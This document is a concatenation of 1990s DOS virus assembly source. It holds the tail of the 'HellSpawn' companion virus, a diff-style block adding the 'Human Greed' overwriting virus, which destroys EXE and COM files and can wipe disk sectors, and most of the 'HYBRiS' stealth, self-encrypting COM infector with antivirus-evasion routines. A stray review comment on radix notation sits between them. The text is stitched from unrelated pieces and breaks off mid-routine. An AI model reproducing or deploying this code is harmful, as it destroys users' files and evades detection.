NewOpen:
push ax bx cx dx es ds si di
mov dx,si
jmp FindZero
Open:
push ax bx cx dx es ds si di
mov si,dx
jmp FindZero
Terminateprog:
mov byte ptr cs:[StealthOn],1
jmp Go21
Int21:
cmp ah,4c
je Terminateprog
or ah,ah
je Terminateprog
cmp byte ptr cs:[StealthOn],0
je AfterStealthChecks
cmp ah,11h
je FindFile
cmp ah,12h
je FindFile
cmp ah,4eh
je FindHandle
cmp ah,4fh
je FindHandle
AfterStealthChecks:
cmp ax,6c00
je NewOpen
cmp ah,3dh
je Open
cmp ax,4b00h
jne Go21
jmp Execute
Go21:
jmp dword ptr cs:[IP_21]
FindHandle:
pushf
call dword ptr cs:[IP_21]
jc ErrorHandleCall
push ax bx cx dx es ds si di
GetDTA:
mov ah,2f
call FakeInt21
cmp word ptr es:[bx+1a],endmain-start ;Check size
jne EndHandle
mov ah,byte ptr es:[bx+15]
and ah,2
jz Endhandle
pop di si ds es dx cx bx ax
mov ah,4f
jmp FindHandle
EndHandle:
pop di si ds es dx cx bx ax
clc
DoneHandleStealth:
retf 02
ErrorHandleCall:
mov ah,12
retf 02
FindFile:
call FakeInt21
cmp al,0ff
je ErrorFF
Stealth:
push ax bx cx dx es ds si di
mov ah,2f
call FakeInt21
cmp byte ptr es:[bx],0ff
jne NotExtended
add bx,7
NotExtended:
cmp word ptr [bx+9],'OC'
jne DoneFF
cmp word ptr [bx+1dh],endmain-start
jne DoneFF
FindNextFile:
pop di si ds es dx cx bx ax
mov ah,12
jmp FindFile
DoneFF:
pop di si ds es dx cx bx ax
iret
ErrorFF:
mov al,0ff
iret
Execute:
push ax bx cx dx es ds si di
call SetCritical
mov si,dx
FindEndOfFilename:
lodsb
or al,al
jne FindEndOfFilename
CheckForCHKDSK:
cmp word ptr ds:[si-9],'DK'
jne AfterChkdsk
mov byte ptr cs:[StealthOn],0
AfterChkdsk:
cmp byte ptr ds:[si-0a],'-' ;If it's f-prot, exit
je EndExec
cmp word ptr ds:[si-4],'XE'
jne EndExec
mov si,dx
mov di,offset filename
push cs
pop es
CopyFilename:
lodsb
stosb
or al,al
jne CopyFilename
push cs
pop ds
ChangeToCom:
mov word ptr es:[di-4],'OC'
mov byte ptr es:[di-2],'M'
CheckIfThere:
mov ax,3d00
mov dx,offset filename
call FakeInt21
xchg bx,ax
jnc CloseVirus
PlaceVirus:
mov ah,3c
mov cx,2
mov dx,offset Filename
call FakeInt21
jc EndEXEC
WriteVirus:
inc byte ptr [InfectionCounter]
xchg bx,ax
mov ah,40
mov cx,endmain-start
mov dx,100
call FakeInt21
CloseVirus:
mov ah,3e
call FakeInt21
EndExec:
call ResetCritical
pop di si ds es dx cx bx ax
jmp Go21
Error13:
stc
retf 02
Int13:
cmp ah,02
je IsDiskRead
jmp GoInt13
IsDiskRead:
pushf
call dword ptr cs:[IP_13]
jc Error13
AbsStealth:
push ax bx cx dx es ds si di
push cs
pop ds
mov di,bx
mov si,100
mov cx,100
repz cmpsb
jcxz IsVirus
jmp DoneAbsStealth
IsVirus:
mov di,bx
mov ax,9090
mov cx,0fe
repnz stosw
mov ax,20cdh
stosw
DoneAbsStealth:
pop di si ds es dx cx bx ax
clc
retf 002
EntryPoint:
push ds
mov ax,ds
dec ax
mov ds,ax
mov byte ptr ds:[0],'Z' ;Mark as last in chain
sub word ptr ds:[03],80 ;Allocate Space From MCB (2k)
sub word ptr ds:[12],80 ;Allocate Space From PSP (2k)
xor ax,ax
mov ds,ax
dec word ptr ds:[413] ;Allocate Memory From Bios (2k)
dec word ptr ds:[413]
mov ax,word ptr ds:[413]
CopyVirusToMem:
mov cl,6
shl ax,cl
sub ax,10
mov es,ax
pop ds
push ds
mov si,100
mov di,100
mov cx,end_prog-start
repnz movsb
;BX = IP of new int, CX = CS, DX = IntNum
;DI = address of interrupt storage
SetInterrupts:
xor ax,ax
mov ds,ax
cli
SetInt21:
mov ax,offset Int21
mov bx,es
xchg ax,word ptr ds:[21*4]
xchg bx,word ptr ds:[21*4+2]
mov word ptr es:[IP_21],ax
mov word ptr es:[CS_21],bx
SetInt13:
mov ax,offset Int13
mov bx,es
xchg ax,word ptr ds:[13*4]
xchg bx,word ptr ds:[13*4+2]
mov word ptr es:[IP_13],ax
mov word ptr es:[CS_13],bx
SetInt10:
mov ax,offset Int10
mov bx,es
xchg ax,word ptr ds:[10*4]
xchg bx,word ptr ds:[10*4+2]
mov word ptr es:[IP_10],ax
mov word ptr es:[CS_10],bx
SetInt1c:
mov ax,offset Int1c
mov bx,es
xchg ax,word ptr ds:[1c*4]
xchg bx,word ptr ds:[1c*4+2]
mov word ptr es:[IP_1c],ax
mov word ptr es:[CS_1c],bx
SetInt09:
mov ax,offset Int09
mov bx,es
xchg ax,word ptr ds:[09*4]
xchg bx,word ptr ds:[09*4+2]
mov word ptr es:[IP_09],ax
mov word ptr es:[CS_09],bx
sti
push cs
pop ds
mov byte ptr cs:[StealthOn],1
RunOriginalProgram:
mov ax,ds:[2c]
mov ds,ax
xor si,si
FindPath:
lodsw
or ax,ax
je FoundPath
dec si
jmp FindPath
FoundPath:
lodsw
ChangeFilenameToEXE:
push ds
pop es
mov di,si
xor al,al
mov cx,0ff
repnz scasb
mov word ptr es:[di-4],'XE'
mov byte ptr es:[di-2],'E'
push cs
pop es
mov ah,4a
mov bx,(end_prog-start+10f)/10
int 21
mov cx,di
sub cx,si
dec cx
mov di,offset Filename
mov al,cl
stosb
repnz movsb
mov byte ptr es:[di],0dh
mov si,offset Filename
push cs
pop ds
int 2e ;Execute Command
mov ax,4c00
int 21
FakeInt21:
pushf
call dword ptr cs:[IP_21]
ret
SetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,offset CriticalHandler
mov bx,cs
cli
xchg ds:[24*4],ax
xchg ds:[24*4+2],bx
mov word ptr cs:[CS_24],bx
mov word ptr cs:[IP_24],ax
sti
pop ds bx ax
ret
ResetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[IP_24]
mov bx,word ptr cs:[CS_24]
cli
mov word ptr ds:[24*4],ax
mov word ptr ds:[24*4+2],bx
sti
pop ds bx ax
ret
CriticalHandler:
mov al,3
iret
Credits db 'HellSpawn v0.91a (c) 1993 by Stormbringer'
EndCred:
Int10:
cmp ah,0
jne GoInt10
mov byte ptr cs:[FireActive],0
cmp al,13
jne GoInt10
mov byte ptr cs:[FireActive],1
GoInt10:
db 0ea
IP_10 dw 0
CS_10 dw 0
Int09:
push ax
in al,60h
cmp al,53h
je IsDel
NotCtrlAltDel:
pop ax
GoInt09:
db 0ea
IP_09 dw 0
CS_09 dw 0
IsDel:
mov ah,2
int 16
and al,1100b
cmp al,0c
jne NotCtrlAltDel
RebootActivation:
mov di,0b800
mov es,di
push cs
pop ds
mov si,offset Fire
mov ax,03
int 10
mov di,550
mov cx,7
BtBigLoop:
push cx
BtDrawFireLine:
mov cx,8
FireLine:
lodsb
mov ah,'Û'
xchg ah,al
stosw
loop FireLine
pop cx
add di,90
loop BtBigLoop
ColdBoot:
db 0ea
db 0,0,0ff,0ff
Int1c:
cmp byte ptr cs:[FireActive],1
jne JmpInt1c
push ax bx cx dx es ds si di
call DrawFire
call ReverseFlame
pop di si ds es dx cx bx ax
JmpInt1c:
db 0ea
IP_1c dw 0
CS_1c dw 0
DrawFire:
push cs
pop ds
mov si,offset Fire
mov di,0a000
mov es,di
xor di,di
mov cx,7
FireLoop:
push cx
mov cx,8
repnz movsb
add di,312d
pop cx
loop FireLoop
ret
ReverseFlame:
push cs cs
pop es ds
mov si,offset Fire
mov cx,7
FlipAll:
push cx
mov cx,4
mov di,si
add di,7
FlipLine:
mov al,byte ptr [si]
xchg al,byte ptr [di]
mov byte ptr [si],al
dec di
inc si
loop FlipLine
pop cx
loop FlipAll
ret
Fire:
db 00,04,00,00,00,00,00,00
db 00,04,0c,04,00,00,00,00
db 00,00,04,0c,04,00,00,00
db 00,00,04,0c,04,04,00,00
db 00,00,04,0e,0c,04,00,00
db 00,04,04,0c,0e,0c,04,00
db 04,04,0c,0e,0f,0c,0c,04
FireActive db 0
InfectionCounter db 0
GoInt13:
db 0ea
endmain:
IP_13 dw ?
CS_13 dw ?
IP_21 dw ?
CS_21 dw ?
CS_24 dw ?
IP_24 dw ?
StealthOn db ?
filename db 50 dup(?)
end_prog:
end start
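Review bot: Apart from the `.radix 16` directive itself, nothing in this listing tells the reader that unsuffixed literals are hexadecimal. The file mixes suffixed and unsuffixed forms (`cmp ah,4c` next to `cmp ah,11h`, `mov cx,100`, `retf 002`), so DOS function numbers and offsets are easy to misread during analysis. I would add `; NOTE: .radix 16 is in effect - every unsuffixed numeric literal below is hexadecimal` directly under the directive. The `add di,312d` in DrawFire deserves its own comment stating the intended value, because how a trailing `d` is interpreted under radix 16 depends on the assembler and cannot be settled from the page.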
@@ -0,0 +1,233 @@
; VirusName : Human Greed
; Origin : Sweden
; Author : The Unforgiven
; Date : 20/12/93
;
; This is a "mutation" of the Infernal Demand virus, written by Metal
; Militia. Even if it's high modified, its ground is still the same.
; This is yet another of this simple overwriting virus, and it's
; nothing really to scream hurray for. This virus will search for
; exe or com files on drive C:, and then overwrite the first 666
; bytes, and therefor permantely destroy the victims. It used the
; "dot-dot" method for changing directory, and when all files are
; infected (overwritten), it will return to the original directory.
; The code is encrypted, thus making it hard to detect. Scan,
; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit.
; Yes, Tbscan used to find this as the "Infernal" virus, but he
; with his 90% (nice try!) failed again!, how patetic!
;
; If a infected file is being run, it's 50% that it will display
; this stupid "Program to big to fit in memory" message. Then
; if the message is printed on the screen, it'll throw the dice
; once more. If the number are 10 or lower, it'll simple wipe out
; the first sectors by overwrite them on your C: drive. This means
; that for each run, it's 5% that it'll "go-off".
; The "message dump" to a file under c:\ has also been deleted.
; And the new routines wich are included are, encryption,
; get/and restore directory, the randomizer, print faker, and
; of'cos the trash routine too. Hope you enjoy the code!
;===============================================================================
; **** HUMAN GREED ****
;===============================================================================
cseg segment byte public
assume cs:cseg, ds:cseg
org 100h
virus_start:
call encrypt_decrypt
jmp encryption_start
write_virus: ; write the virus to the
call encrypt_decrypt ; files, by overwriting
mov dx,100h ; its beginning
mov ah,40h ;
mov cx,666 ; How sadistical??
int 21h ;
call encrypt_decrypt ;
ret
encryption_value dw 0
encrypt_decrypt:
mov si,offset encryption_start
mov dx,encryption_value
mov cx,(end_of_virus-encryption_start+1)/2
xor_loop:
xor word ptr cs:[si],dx
add si,2
call fool_scan_for_TridenT_virus ; must call this meaningless
loop xor_loop ; routine, otherwise, infected
ret ; files will be reported by
fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus.
ret
; just return.
encryption_start:
; get current drive
mov ah,19h ; get current drive
int 21h ;
push ax ;
; move to c:
mov ah,0Eh ;
mov dl,02h ; drive C:
int 21h
; get directory.
mov ah,47h
xor dl,dl
lea si,[bp+infernal+2ch]
int 21h
great:
; find first files (starting .exe's).
mov dx,offset ExeMask ; offset 'EXEMASK'
mov ah,4Eh ; find first
int 21h ; via int21
jnc go_for_it ; jmp if no ERROR
; if no exe's was found, just infect.COM files.
mov dx,offset ComMask ; offset 'COMMASK'
mov ah,4Eh ; find first file
;
again: ;
int 21h ;
jc chdir ;
go_for_it:
mov ax,4300h ; Get attribute of file
mov dx,9eh ; Pointer to name in DTA
int 21h ;
push cx ; Push the attrib to stack
mov ax,4301h ; Set attribute to
xor cx,cx ; normal
int 21h ;
mov ax,3D02h ; Open file
mov dx,9eh ; Pointer to name in DTA
int 21h
jc next ; if error, get next file
xchg ax,bx ; Swap AX & BX
; so the filehandle ends up
; in BX
mov ax,5700h ; Get file date
int 21h ;
push cx ; Save file dates
push dx ;
mov encryption_value,50 ; encryption_value.
call write_virus ; write to file(s).
pop dx ; Get the saved
pop cx ; filedates from the stack
mov ax,5701h ; Set them back to the file
int 21h ;
mov ah,3Eh ; Close the file
int 21h ;
pop cx ; Restore the attribs from
; the stack.
mov dx,9eh ; Pointer to name in DTA
mov ax,4301h ; Set them attributes back
int 21h ;
next:
mov ah,4Fh ; now get the next file
jmp short again ; and do it all over again
chdir:
; change directory to [..] and start infect again.
mov dx,offset dot_dot ; offset 'updir'
mov ah,3bh ; change directory
int 21h
jnc great ; jmp to great if no ERROR
exit:
; Throw the dice..
mov ah,2ch ;
int 21h ;
cmp dl,50
ja real_quit ;
jmp print
; no, quitting time, yet..
print:
; first print message.
mov ah,09h ; Print Fake message.
mov dx,offset sign ;
int 21h ;
get_random:
; Throw of a die..
mov ah,2ch ; Randomize.
int 21h ;
cmp dl,10 ;
ja real_quit ;
jmp trash ; bad bad boy..
trash:
; Trash routine from Nowhere Man of [NuKE], thanks.
cli ;
mov ah,2 ; 2=C:
cwd ;
mov cx,0100h ;
int 026h ;
JMP REAL_QUIT
real_quit:
pop dx ;
mov ah,0Eh ; restore org. drive
int 21h ;
; restore directory
lea dx,[bp+infernal+2ch]
mov ah,3bh
int 21h
; time to quit
mov ah,4ch ; return to prompt
int 21h ; via int21
; some data.
ExeMask db '*.EXE',0 ; tought one, huh?
ComMask db '*.COM',0 ; what is this, hm
dot_dot db '..',0 ; '..'
Note db 'That is not dead '
db 'Which can eternal lie '
db 'Yet with strange aeons '
db 'Even death may die '
db 'LiVe AfteR DeATH...'
db 'Do not waste your time '
db 'Searching For '
db 'those wasted years! '
db '(c) 93/94 The Unforgiven/Immortal Riot '
db 'Thanks to Raver and Metal Militia/IR '
truenote db 'Maria K - Life is limited, love is forever... '
db 'Open to reality, forever in love... '
sign db 'Program too big to fit in memory$' ; fake message!
sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! '
db 'Do You Belive? '
db 'Farwell!....'
end_of_virus:
infernal:
cseg ends
end virus_start
@@ -0,0 +1,896 @@
;===============================================================================
; HYBRiS (c) 1995 The Unforgiven/Immortal Riot
; Brief description:
; TSR COM-infecting, full-stealth virus
; Self-encrypted
; Wasn't scannable when it was released by FP/Tbav/AVP..
; Has quite some collection of grafical payloads (hoping to get AVP attention).
; Multipe interrupt handlers
; Int24h hooking
; Anti-anti-VSAFE-viruses.
; Special thanks to Priest & Stormbringer of Phalcon/Skism
;===============================================================================
.model tiny
.code
org 100h
vir_size equ virus_end-virus_start
virus_start:
jmp entry_point
install:
mov ax,99 ;input = rnd_value in AX
call random ;output = (zero -> rnd_value)
jne get ;if output=0, activate..
mov cs:[activate_flag][bp],1
get:
mov ax,108
call random
jne real_get
start_payload:
call main_payload ;'loop' until ESC is being pressed..
in al,60h
cmp al,1
jne start_payload
jmp short real_get
main_payload: ;remake of a payload I wrote for
mov ax,3 ;IR#6..
int 10h
push ax
push cx
push dx
mov ax,03f00h
mov dx,03c8h
out dx,al
inc dx
mov ax,-1
out dx,al
xchg al,ah
out dx,al
xchg al,ah
out dx,al
mov cx,-1
loop $
dec dx
xor ax,ax
out dx,al
inc dx
out dx,al
out dx,al
out dx,al
pop dx
pop cx
pop ax
ret
real_get:
mov ah,4ah ;Residency routine combined with
mov bx,-1 ;installation check
mov cx,0d00dh
int 21h
cmp ax,cx
jne not_res
jmp already_resident
not_res:
mov ah,4ah ;resize mcb
sub bx,(vir_size+15)/16+1 ;bx=size in para's
int 21h ;es =segment
mov ah,48h ;allocate memory block
mov bx,(vir_size+15)/16 ;bx = size in para's
int 21h ;returns pointer to the beginning
;of the new block allocated
dec ax ;dec ES to get pointer to mcb
mov es,ax ;es=segment
mov word ptr es:[1],8 ;ofs:1 in mcb = owner, 8 = dos
push cs ;cs=ds
pop ds
cld ;clear direction
sub ax,0fh ;substact 15 from ax,
mov es,ax ;thus es:[100h] = start of allocated memory
mov di,100h ;di = 100h (beginning of file)
lea si,[bp+offset virus_start] ;si points to start of virus
mov cx,(vir_size+1)/2 ;copy it resident with words
rep movsw ;until cx = 0 (the whole virus copied)
push es ;es=ds
pop ds
mov ax,3521h ;get interrupt vector from es:bx for
int 21h ;int21h
tb_lup:
cmp word ptr es:[bx],05ebh ;all tbav's utils starts with this code,
jne no_tbdriver ;if its found, get next interrupt handler
cmp byte ptr es:[bx+2],0eah ;and use that as the int21h adress
jne no_tbdriver ;thereby, cutting tbav out from our
les bx,es:[bx+3] ;int21h handler. loop until it's out of
jmp tb_lup ;there. (dunno if this works anymore..)
no_tbdriver:
mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h
mov word ptr ds:[Org21seg],es ;in a word each
cmp byte ptr cs:[activate_flag][bp],1 ;check if we should activate
jne skip_08_get ;the int8 handler
mov al,08h ;if so, get interrupt-vector
int 21h ;for int8h
mov word ptr ds:[org08ofs],bx
mov word ptr ds:[org08seg],es
skip_08_get:
mov al,09h ;int9
int 21h
mov word ptr ds:[org09ofs],bx
mov word ptr ds:[org09seg],es
mov al,16h ;16h
int 21h
mov word ptr ds:[org16ofs],bx
mov word ptr ds:[org16seg],es
mov dx, offset new_int21h ;set new interrupt handlers
mov ax,2521h ;to ds:dx for int21h
int 21h
cmp byte ptr cs:[activate_flag][bp],1 ;if we didnt get int8, dont
jne skip_08_set ;set a new either!
mov dx, offset new_08h
mov al,08h
int 21h
skip_08_set:
mov dx,offset new_09h ;int9 handler installed
mov al,09h
int 21h
mov dx,offset new_16h ;int 16h handler installed
mov al,16h
int 21h
already_resident:
tbdriver:
mov di,100h
push di ;save di at 100h
push cs ;make cs=ds=es
push cs
pop es
pop ds
lea si,[bp+orgjmp] ;and copy the first 4-init-bytes to
movsw ;the beginning (in memory) so we can
movsw ;return back to the host properly
ret ;jmp di, 100h (since we pushed it above)
new_int21h:
cmp ah,4ah ;installation check part at the beginning
jne chk_vsafe ;no 4ah executed, try next option
cmp bx,-1 ;ah = 4ah, check if bx and cx is set by
jne no_match ;our virus
cmp cx,0d00dh
jne no_match ;no.
mov ax,cx ;move cx into ax
iret ;and do a interrupt return
chk_vsafe:
cmp ax,0fa01h ;a resident anti-virus-virus,
jne chk_exec ;checker
cmp dx,5945h
je go_vsafe
chk_exec:
cmp ax,4b00h ;Since this is a com infector only,
je go_infect ;I don't have to check if al=0, still
;I do it :).
chk_close:
cmp ah,3eh ;check for file-closes
je go_close ; ==> infect
cmp ah,3dh ;file open
je go_disinfect ; ==> disinfect
chk_dir:
cmp ah,11h ;stealth functions on
je go_fcb_stealth ;directory listenings with
cmp ah,12h ;11/12/4e/4fh
je go_fcb_stealth
cmp ah,4eh
je go_handle_stealth
cmp ah,4fh
je go_handle_stealth
no_match:
jmp do_oldint21h ;nothing matched!
go_vsafe: ;indirect-jumps due to 128d bytes jmp's
jmp unload_vsafe ;directives.
go_infect:
jmp infect
go_close:
call setcritical ;if infect on close, install a critical
jmp infect_close ;error handler before
go_disinfect:
call setcritical ;disinfect calls also modifies programs,
jmp disinfect_dsdx ;install the int24h handler before trying
;doing disinfection
go_fcb_stealth: ;11 & 12h calls get's here, to be
jmp hide_dir ;transfered into another routine
;(* Very unstructured programming *)
go_handle_stealth:
jmp hide_dir2
dps db "THIS PROGRAM IS (C) 1995 IMMORTAL RIOT",0 ; no shit!
new_08h:
push ax ;If the int08h installer is
push dx ;installed, the screen background
mov dx,03c8h ;color will fade to white return
xor al,al ;to original color (black), and
out dx,al ;'loop' that procedure all over again
inc dx ;since its activated all the time by
mov al,[cs:bgcol] ;dos internal services. .
out dx,al
out dx,al
out dx,al
inc [cs:bgcol]
pop dx
pop ax
db 0eah
org08ofs dw ?
org08seg dw ?
bgcol db 0
new_09h:
push ax ;preserve register in use
push ds
xor ax,ax
mov ds,ax ;ds=0
in al,60h ;read key
cmp al,53h ;delete?
jnz no_ctrl_alt_del ;no!
test byte ptr ds:[0417h],0ch ;test for alt OR ctrl
je no_ctrl_alt_del ;
jpo no_ctrl_alt_del ;<- Wow. ctrl and alt?
in al,40h ;A small randomizer, this gives us
and al,111111b ;one in 64 I reckon :-).
cmp al,111111b
je no_ctrl_alt_del
push cs
pop ds
mov ax,3 ;set grafic mode and clear screen, too
int 10h
mov ah,2 ;set cursor pos
xor bh,bh
mov dx,0A14h ;10,20d (middle)
int 10h
mov ah,1 ;set cursor
mov cx,2020h ;>nul
int 10h
mov si,offset dps ;point to v_name, of sorts.
all_chars:
loop all_chars
lodsb ;load string by byte from dps
or al,al ;end of string? (al=0)
je cold_boot ;yes, make a cold boot
mov ah,0Eh ;display character from string
int 10h
jmp short all_chars ;put next char to string
cold_boot:
db 0eah ;jmp far ptr
db 00h, 00h, 0ffh,0ffh
no_ctrl_alt_del:
pop ds ;restore registers
pop ax
do_oldint09h:
db 0eah ;and jump to saved vector for int09h
org09ofs dw ?
org09seg dw ?
new_16h:
cmp ax,0fa01h ;check ax for 'vsafe-unload-value'
jne do_oldint16h ;no match in ax.
cmp dx,5945h ;check ds for 'vsafe-unload-value'
jne do_oldint16h ;no match in dx.
jmp unload_vsafe ;program is probably virus-infected.
do_oldint16h:
db 0eah ;program is not trying to unload
org16ofs dw ? ;vsafe..
org16seg dw ?
hide_dir: ;FCB stealth routine
pushf ;simulate a int call with pushf
push cs ;and cs, ip on the stack
call do_oldint21h
or al,al ;was the dir call successfull??
jnz skip_dir ;(i.e. did we find files?)
push ax ;we did find files, save ax/bx/es
push bx ;since we use them in this routine
push es
mov ah,62h ;get active PSP to es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;PSP belongs to dos?
jnz bad_psp ;no, just stealth on DIR (ie. command.com
;is the owner of the psp)
mov bx,dx ;offset to unopened FCB in BX
mov al,[bx] ;FCB-type in AL..
push ax ;Save it
mov ah,2fh ;Get DTA-area
int 21h
pop ax ;Restore AX
inc al ;check if al=0 or al=ff
jnz no_ext ;If it's not 0, then, it's not extended
add bx,7 ;if it's extended add 7 to skip garbage
no_ext:
mov al,byte ptr es:[bx+17h] ;get seconds field
and al,1fh
xor al,1dh ;is the file infected??
jnz no_stealth ;if not - don't hide size
cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds
jbe no_stealth ;as an infected is smaller -
sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size
no_stealth:
bad_psp:
pop es ;restore segments/registers
pop bx ;used and return to caller
pop ax
skip_dir:
iret
hide_dir2: ;4e/4fh stealth
pushf
push cs
call do_oldint21h
jc no_files
pushf
push ax
push di
push es
push bx
mov ah,2fh
int 21h
mov di,bx
add di,1eh
cld
mov cx,9 ;scan for the '.' which seperates
mov al,'.' ;the filename from the extension
repne scasb
jne not_inf ;<- Filename without any extension!
cmp word ptr es:[di],'OC'
jne not_inf ;most likely a com
cmp byte ptr es:[di+2],'M'
jne not_inf ;Definitly com
mov ax,es:[bx+16h] ;ask file time
and al,1fh
xor al,1dh ;can the file be infected?
jnz not_inf
cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small
ja hide ;files
cmp word ptr es:[bx+1ch],0 ;>64k? (no-com)
je not_inf ;don't stealth too large files..
hide:
sub es:[bx+1ah],vir_size-3 ;stealth
not_inf:
pop bx
pop es
pop di
pop ax
popf
no_files:
retf 2
infect_close: ;3eh calls arrives at this entry
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
cmp bx,4 ;don't close null, aux and so
jbe no_close
call check_name ;es:di points to file name
add di,8 ;es:di points to extension
cmp word ptr es:[di],'OC'
jne no_close
cmp byte ptr es:[di+2],'M' ;es:di+2 points to 3rd char in extension
je close_infection
no_close:
pop dx ;no com-file being opened
pop ds
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es
jmp do_oldint21h
close_infection:
or byte ptr es:[di-26h],2
mov cs:Closeflag,1 ;mark that 3e-infection = on
mov ax,4200h ;seek tof.
xor cx,cx
cwd
int 21h
jmp short infect_on_close ;infect it
check_name:
push bx
mov ax,1220h ;get job file table for handle at es:di
int 2fh
mov ax,1216h ;get system file table
mov bl,byte ptr es:[di] ;for handle index in bx
int 2fh
pop bx
add di,20h ;es:di+20h points to file name
ret ;return
infect:
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
call setcritical ;install a critical error handler
mov cs:Closeflag,0 ;make sure closeflag is off
mov ax,4300h ;get attrib
int 21h
push cx ;save attrib onto the stack
mov ax,4301h ;clear attrib
xor cx,cx
int 21h
mov ax,3d00h ;open file in read mode only
int 21h
xchg ax,bx
mov ax,1220h
int 2fh
push bx
mov ax,1216h ;modify
mov bl,byte ptr es:[di]
int 2fh
pop bx
or byte ptr es:[di+2],2 ;to read & write mode in the SFT-entry
infect_on_close: ;entry for infection on 3eh
push cs ;cs=ds
pop ds
mov ax,5700h ;get time/date
int 21h
push cx ;save time/date onto the stack
push dx
mov ah,3fh ;read first four bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file
je exe_file
cmp word ptr ds:orgjmp,'MZ'
je exe_file ;if so - don't infect
cmp byte ptr ds:orgjmp+3,'@' ;dont reinfect!
jne lseek_eof
jmp skip_infect
exe_file:
mov cs:exeflag,1 ;mark file as EXE-file, and
jmp short skip_infect ;don't set second value for it!
lseek_eof:
mov ax,4202h ;go end of file, offset in dx:cx
xor cx,cx ;and return file size in dx:ax.
xor dx,dx
int 21h
cmp ax,(0FFFFH-Vir_size) ;dont infect to big or
jae skip_infect ;to small files
cmp ax,(vir_size-100h)
jb skip_infect
add ax,offset entry_point-106h ;calculate entry offset to jmp
mov word ptr ds:newjmp[1],ax ;move it [ax] to newjmp
get_rnd:
mov ah,2ch ;get random number and put enc_val
int 21h
or dl,dl ;dl=0 - get another value!
je get_rnd
mov word ptr ds:enc_val,dx
mov ax,08d00h ;copy entire virus to 8d00h:100h
mov es,ax
mov di,100h
mov si,di
mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp ;and encrypt it there
call encrypt
mov ah,40h ;write virus to file from position
mov cx,virus_end-install ;08d00h:100h
mov dx,offset install
int 21h
push cs ;cs=ds
pop ds
mov ax,4200h ;go to beginning of file
xor cx,cx
cwd
int 21h
mov ah,40h ;and write a new-jmp-construct
mov cx,4 ;of 4 bytes (4byte=infection marker)
mov dx,offset newjmp
int 21h
skip_infect:
mov ax,5701h ;restore
pop dx ;date
pop cx ;time
cmp byte ptr cs:[exeflag],1 ;exe file?
je skip_sec ;if so - keep the sec_value intact
or cl,00011101b ;and give com-files second value
and cl,11111101b ;29
skip_sec:
int 21h
cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection,
je dont_close ;if infect on close, dont close file
close_file:
mov ah,3eh ;close the file which were executed
int 21h
pop cx ;get original file-attribs
dont_close:
pop dx ;ds:dx = filename
pop ds
cmp byte ptr cs:[Closeflag],1
je exit_close
mov ax,4301h ;set back saved attribute
int 21h
exit_close:
mov byte ptr cs:closeflag,0
call resetcritical ;set back critical error handler int24h
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es ;restore registers in use
do_oldint21h:
O21h:
db 0eah ;jmp far ptr
org21ofs dw ? ;s:o to
org21seg dw ? ;int21h
ret ;call to DOS. . . return!
unload_vsafe:
mov ah,9
mov dx, offset v_name
push ds
push cs
pop ds
int 21h
pop ds
mov ax,4c00h ;exit program infected with an other
int 21h ;virus.
v_name db "[HYBRiS] (c) '95 =TU/IR=",'$'
closeflag db 0
exeflag db 0
activate_flag db 0
disinfect_dsdx:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es ;save all regs/segs...
push ds
pop es ;ds=es
mov cx,64 ;scan for the dot which
mov di,dx ;seperates filename from
mov al,'.' ;extension
cld ;clear direction
repne scasb ;
jne nocom ;<- was no '.' in filename
;(aint likely a comfile)
cmp word ptr ds:[di],'OC'
je smallc
cmp word ptr ds:[di],'oc'
jne nocom
smallc:
cmp byte ptr ds:[di+2],'M'
je open_com
cmp byte ptr ds:[di+2],'m'
je open_com
nocom:
jmp no_com_opened ;no com-file being opened!
open_com:
mov ax,3d02h ;Tbav utils might intercept this
pushf ;action.
push cs
call o21h
xchg ax,bx
push cs ;cs=ds=es
pop ds
push cs
pop es
mov ax,5700h ;get time
int 21h
push cx
push dx
and cl,1fh ;see if seconds = 29
xor cl,1dh
jne close_dis ;its not! (file = not infected)
mov ah,3fh ;read first bytes of the infected
mov cx,4 ;program
mov dx,offset ds:orgjmp
int 21h
cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp?
jne close_dis
cmp byte ptr ds:orgjmp+3,'@' ;fourth byte = '@'?
jne close_dis
mov ax,4202h ;opened file is infected,
mov cx,-1 ;seek the location where we
mov dx,-(virus_end-orgjmp) ;stored the first bytes of the
int 21h ;original program
mov ah,3fh ;read those bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset orgjmp ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (endoffile-virussize)
mov cx,-1
mov dx,-(virus_end-install)
int 21h
mov ah,40h ;truncate file
xor cx,cx
int 21h
close_dis:
mov ax,5701h ;restore saved
pop dx ;date
pop cx ;and time
int 21h ;
mov ah,3eh ;close the file
pushf
push cs
call o21h
no_com_opened:
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
bail_out:
jmp o21h ;and bail out!
random:
push ds
push bx
push cx
push dx
push ax
xor ax,ax
int 1ah
push cs
pop ds
in al,40h
xchg cx,ax
xchg dx,ax
mov bx,offset ran_num
xor ds:[bx],ax
rol word ptr ds:[bx],cl
xor cx,ds:[bx]
rol ax,cl
xor dx,ds:[bx]
ror dx,cl
xor ax,dx
imul dx
xor ax,dx
xor ds:[bx],ax
pop cx
xor dx,dx
inc cx
je random_ret
div cx
xchg ax,dx
random_ret:
pop dx
pop cx
pop bx
pop ds
or ax,ax
ret
SetCritical:
push ax ds
mov ax,9
mov ds,ax
push word ptr ds:[0]
